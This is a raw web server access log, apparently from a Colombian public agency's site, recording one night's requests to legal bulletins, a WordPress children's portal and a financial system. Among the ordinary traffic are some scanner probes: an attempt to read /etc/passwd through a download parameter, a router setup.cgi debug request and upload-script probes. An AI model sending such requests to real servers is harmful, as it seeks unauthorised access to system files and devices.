220.132.170.156 - - [28/Feb/2024:00:31:56 -0500] "POST / HTTP/1.1" 200 4720
172.22.2.4 - - [28/Feb/2024:00:30:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [28/Feb/2024:00:32:00 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:00:32:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:00:32:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
173.252.107.3 - - [28/Feb/2024:00:32:49 -0500] "GET /camino-guadalupe-aguanoso-abierto-de-nuevo-al-publico.html HTTP/1.1" 200 879
172.22.2.4 - - [28/Feb/2024:00:31:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
201.245.192.253 - - [28/Feb/2024:00:33:54 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
205.169.39.197 - - [28/Feb/2024:00:34:08 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
201.245.192.253 - - [28/Feb/2024:00:34:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
205.169.39.197 - - [28/Feb/2024:00:34:13 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
205.169.39.197 - - [28/Feb/2024:00:34:13 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
205.169.39.197 - - [28/Feb/2024:00:34:14 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
205.169.39.197 - - [28/Feb/2024:00:34:15 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
205.169.39.197 - - [28/Feb/2024:00:34:15 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
205.169.39.197 - - [28/Feb/2024:00:34:15 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
205.169.39.197 - - [28/Feb/2024:00:34:16 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
205.169.39.197 - - [28/Feb/2024:00:34:16 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
205.169.39.197 - - [28/Feb/2024:00:34:16 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
205.169.39.197 - - [28/Feb/2024:00:34:16 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
205.169.39.197 - - [28/Feb/2024:00:34:16 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
205.169.39.197 - - [28/Feb/2024:00:34:16 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
205.169.39.197 - - [28/Feb/2024:00:34:18 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
205.169.39.197 - - [28/Feb/2024:00:34:18 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
205.169.39.197 - - [28/Feb/2024:00:34:18 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
205.169.39.197 - - [28/Feb/2024:00:34:19 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
205.169.39.197 - - [28/Feb/2024:00:34:19 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
220.132.170.156 - - [28/Feb/2024:00:35:46 -0500] "\x16\x03\x01" 400 226
201.245.192.253 - - [28/Feb/2024:00:35:54 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:00:36:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
69.63.189.118 - - [28/Feb/2024:00:36:57 -0500] "GET /images/plantacion-humedal-la-conejera.jpg HTTP/1.1" 200 92644
216.245.221.92 - - [28/Feb/2024:00:37:00 -0500] "HEAD / HTTP/1.1" 200 -
69.63.189.120 - - [28/Feb/2024:00:37:00 -0500] "GET /images/WhatsApp%20Image%202023-04-05%20at%2013.54.41.jpeg HTTP/1.1" 200 210747
69.63.189.120 - - [28/Feb/2024:00:37:01 -0500] "GET /images/Rmasar%2018%20de%20febrero%20Grupo.jpg HTTP/1.1" 200 68398
69.63.189.7 - - [28/Feb/2024:00:37:01 -0500] "GET /images/Sello%201%20JA-2.jpeg HTTP/1.1" 200 42236
69.63.189.113 - - [28/Feb/2024:00:37:01 -0500] "GET /images/1%20de%20febrero%20D\xc3\xada%20sin%20carro.jpeg HTTP/1.1" 404 1034
69.63.189.7 - - [28/Feb/2024:00:37:01 -0500] "GET /images/vertimiento-Comprimida%20(1).png HTTP/1.1" 200 22870
69.63.189.2 - - [28/Feb/2024:00:37:02 -0500] "GET /images/1%20de%20febrero%20D\xc3\xada%20sin%20carro.jpeg HTTP/1.1" 404 1034
201.245.192.253 - - [28/Feb/2024:00:37:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
172.22.2.4 - - [28/Feb/2024:00:36:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:00:37:54 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:00:38:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
190.84.43.161 - - [28/Feb/2024:00:38:23 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 2141688
172.22.2.4 - - [28/Feb/2024:00:36:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
125.229.173.191 - - [28/Feb/2024:00:38:55 -0500] "POST /login.htm HTTP/1.1" 404 1034
216.244.66.246 - - [28/Feb/2024:00:39:48 -0500] "GET /durante-el-puente-de-reyes-y-en-el-regreso-a-bogota-ayuda-a-mantener-una-buena-calidad-del-aire.html HTTP/1.1" 200 991
201.245.192.253 - - [28/Feb/2024:00:39:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39617
201.245.192.253 - - [28/Feb/2024:00:39:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37182
201.245.192.253 - - [28/Feb/2024:00:39:54 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:00:39:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39608
201.245.192.253 - - [28/Feb/2024:00:40:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
125.229.173.191 - - [28/Feb/2024:00:40:27 -0500] "GET /index.php?download=/etc/passwd HTTP/1.1" 404 1035
201.245.192.253 - - [28/Feb/2024:00:40:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37182
65.154.226.171 - - [28/Feb/2024:00:41:31 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
65.154.226.171 - - [28/Feb/2024:00:41:31 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
65.154.226.171 - - [28/Feb/2024:00:41:31 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
65.154.226.171 - - [28/Feb/2024:00:41:31 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
65.154.226.171 - - [28/Feb/2024:00:41:31 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
65.154.226.171 - - [28/Feb/2024:00:41:31 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
65.154.226.171 - - [28/Feb/2024:00:41:31 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
65.154.226.171 - - [28/Feb/2024:00:41:31 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
65.154.226.171 - - [28/Feb/2024:00:41:31 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
65.154.226.171 - - [28/Feb/2024:00:41:31 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
65.154.226.171 - - [28/Feb/2024:00:41:31 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
65.154.226.171 - - [28/Feb/2024:00:41:31 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
65.154.226.171 - - [28/Feb/2024:00:41:31 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
65.154.226.171 - - [28/Feb/2024:00:41:31 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
65.154.226.171 - - [28/Feb/2024:00:41:31 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
65.154.226.171 - - [28/Feb/2024:00:41:31 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
65.154.226.171 - - [28/Feb/2024:00:41:31 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
65.154.226.171 - - [28/Feb/2024:00:41:31 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
65.154.226.171 - - [28/Feb/2024:00:41:32 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
65.154.226.171 - - [28/Feb/2024:00:41:32 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
65.154.226.171 - - [28/Feb/2024:00:41:32 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
65.154.226.171 - - [28/Feb/2024:00:41:31 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
65.154.226.171 - - [28/Feb/2024:00:41:32 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
65.154.226.171 - - [28/Feb/2024:00:41:32 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
65.154.226.171 - - [28/Feb/2024:00:41:32 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
65.154.226.171 - - [28/Feb/2024:00:41:32 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
65.154.226.171 - - [28/Feb/2024:00:41:32 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
65.154.226.171 - - [28/Feb/2024:00:41:32 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
65.154.226.171 - - [28/Feb/2024:00:41:32 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
65.154.226.171 - - [28/Feb/2024:00:41:32 -0500] "GET /portaldeninos/wp-content/themes/betheme/images/box_shadow.png HTTP/1.1" 200 108
65.154.226.171 - - [28/Feb/2024:00:41:32 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
201.245.192.253 - - [28/Feb/2024:00:41:54 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [28/Feb/2024:00:42:00 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:00:42:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
201.245.192.253 - - [28/Feb/2024:00:42:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
146.19.24.28 - - [28/Feb/2024:00:42:24 -0500] "GET / HTTP/1.1" 200 319
125.229.173.191 - - [28/Feb/2024:00:43:16 -0500] "GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1" 404 1035
125.229.173.191 - - [28/Feb/2024:00:43:20 -0500] "\x16\x03\x01" 400 226
172.22.2.4 - - [28/Feb/2024:00:41:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:00:43:54 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:00:44:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:00:42:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
190.158.201.175 - - [28/Feb/2024:00:45:14 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:00:45:14 -0500] "POST /sipse/faces/presentacion/sistema/reporte/ventanaVerReporteParametros.xhtml HTTP/1.1" 200 39912
190.158.201.175 - - [28/Feb/2024:00:45:15 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:00:45:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:00:45:16 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:00:45:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:00:45:17 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1392
190.158.201.175 - - [28/Feb/2024:00:45:45 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5148
190.158.201.175 - - [28/Feb/2024:00:45:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 149425
190.158.201.175 - - [28/Feb/2024:00:45:51 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:00:45:51 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:00:45:52 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:00:45:52 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Feb/2024:00:45:54 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
190.158.201.175 - - [28/Feb/2024:00:45:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 84277
190.158.201.175 - - [28/Feb/2024:00:45:58 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 188571
190.158.201.175 - - [28/Feb/2024:00:46:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 131671
190.158.201.175 - - [28/Feb/2024:00:45:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 2141684
201.245.192.253 - - [28/Feb/2024:00:46:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
190.158.201.175 - - [28/Feb/2024:00:46:08 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 1470043
190.158.201.175 - - [28/Feb/2024:00:46:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 1304989
190.158.201.175 - - [28/Feb/2024:00:46:12 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5525
190.158.201.175 - - [28/Feb/2024:00:46:13 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 200 120589
190.158.201.175 - - [28/Feb/2024:00:46:04 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5976722
190.158.201.175 - - [28/Feb/2024:00:46:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 6358446
172.22.2.4 - - [28/Feb/2024:00:46:26 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20T-411%20DE%201992.doc HTTP/1.1" 200 41984
190.158.201.175 - - [28/Feb/2024:00:46:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5514
216.244.66.195 - - [28/Feb/2024:00:46:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0227.pdf HTTP/1.1" 200 370030
216.245.221.92 - - [28/Feb/2024:00:47:00 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:00:47:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
186.102.72.119 - - [28/Feb/2024:00:47:30 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX1+z/eOE8cof+oqrgL3fRmAWkkFbQdMBU15Hjq7Nh9WpJdSvRyst/NvbIjwpDuPwRlKLKB/l249A0I/l4GomNhWXvtm9KysP02y0rS7eyS66n349CTi9GOJM/G6/N2GPgBD1TXpENT1H8tBS1nukzc+rwaYf4GtpKDs=&u=U2FsdGVkX1+AXxkrElYpi0sfq4jJc12rcGAEGc5jwwoZDcW3cmZiXpM+UXIre29Y&y=U2FsdGVkX18JmX7a+uta7BURfvJYDqQWK97dOQ9l5pZGGjetofFrefmvwmXpcNUU HTTP/1.1" 200 60
216.244.66.195 - - [28/Feb/2024:00:47:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0261.pdf HTTP/1.1" 200 370648
211.21.37.120 - - [28/Feb/2024:00:47:54 -0500] "\x16\x03\x01" 400 226
201.245.192.253 - - [28/Feb/2024:00:47:54 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:00:48:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [28/Feb/2024:00:48:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0471.pdf HTTP/1.1" 200 390619
190.158.201.175 - - [28/Feb/2024:00:48:54 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 33734
190.158.201.175 - - [28/Feb/2024:00:48:55 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:00:48:56 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:00:48:56 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:00:48:57 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:00:48:57 -0500] "POST /sipse/faces/presentacion/sistema/reporte/listarReportes.xhtml HTTP/1.1" 200 27046
190.158.201.175 - - [28/Feb/2024:00:48:58 -0500] "POST /sipse/faces/presentacion/sistema/reporte/listarReportes.xhtml HTTP/1.1" 200 27046
211.21.37.120 - - [28/Feb/2024:00:48:59 -0500] "GET /pme/media/ HTTP/1.1" 404 1034
190.84.43.161 - - [28/Feb/2024:00:48:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5525
190.84.43.161 - - [28/Feb/2024:00:48:59 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 200 120550
190.158.201.175 - - [28/Feb/2024:00:48:59 -0500] "POST /sipse/faces/presentacion/sistema/reporte/listarReportes.xhtml HTTP/1.1" 200 22362
190.158.201.175 - - [28/Feb/2024:00:48:59 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:00:48:59 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:00:48:59 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:00:48:59 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:00:48:59 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:00:48:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:00:48:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:00:49:00 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.84.43.161 - - [28/Feb/2024:00:49:07 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
211.21.37.120 - - [28/Feb/2024:00:49:08 -0500] "POST /incom/modules/uploader/showcase/script.php HTTP/1.1" 404 1035
211.21.37.120 - - [28/Feb/2024:00:49:09 -0500] "GET /upload/userfiles/image/2cwbEgdPfEvG71tvDVL7E48PMQ1.png HTTP/1.1" 404 1035
211.21.37.120 - - [28/Feb/2024:00:49:16 -0500] "GET /ext-js/index.html HTTP/1.1" 404 1035
172.22.2.4 - - [28/Feb/2024:00:49:17 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
216.244.66.195 - - [28/Feb/2024:00:49:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/1541.pdf HTTP/1.1" 200 1252441
172.22.2.4 - - [28/Feb/2024:00:47:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:00:49:54 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
211.21.37.120 - - [28/Feb/2024:00:50:05 -0500] "\x16\x03\x01" 400 226
201.245.192.253 - - [28/Feb/2024:00:50:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [28/Feb/2024:00:50:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/1631.pdf HTTP/1.1" 200 603215
172.22.2.4 - - [28/Feb/2024:00:49:31 -0500] "POST /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [28/Feb/2024:00:48:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54913
165.154.119.20 - - [28/Feb/2024:00:50:20 -0500] "\x16\x03\x01\x01\x17\x01" 400 226
165.154.119.20 - - [28/Feb/2024:00:50:33 -0500] "GET / HTTP/1.1" 200 319
165.154.119.20 - - [28/Feb/2024:00:50:50 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
190.84.43.161 - - [28/Feb/2024:00:50:50 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5529
190.84.43.161 - - [28/Feb/2024:00:50:50 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 200 120550
165.154.119.20 - - [28/Feb/2024:00:50:51 -0500] "GET /robots.txt HTTP/1.1" 404 1018
